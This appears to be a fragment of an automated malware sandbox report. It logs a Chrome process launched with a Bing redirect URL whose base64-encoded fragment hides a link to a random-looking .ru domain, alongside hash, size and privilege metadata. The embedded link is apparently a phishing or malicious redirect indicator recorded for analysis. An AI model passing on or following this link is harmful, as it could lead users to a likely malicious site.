                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.bing.com/ck/a?!&&p=24da94b1cbc4e30be5abd9acb5737b3bdb775a56c39aac0141dd9c17c937dea1JmltdHM9MTczMzI3MDQwMA&ptn=3&ver=2&hsh=4&fclid=1bf8b81c-3b95-652f-24ec-ad573a81643b&u=a1aHR0cHM6Ly93d3cueXV4aW5na2V0YW5nLmNvbS9jb2xsZWN0aW9ucy90aHJvdy1ibGFua2V0cw#aHR0cHM6Ly9Uby5lZW1qaGl1bHoucnUvek83UkZORy8="
                                              Imagebase:0x7ff76e190000
                                              File size:3'242'272 bytes
                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              No disassembly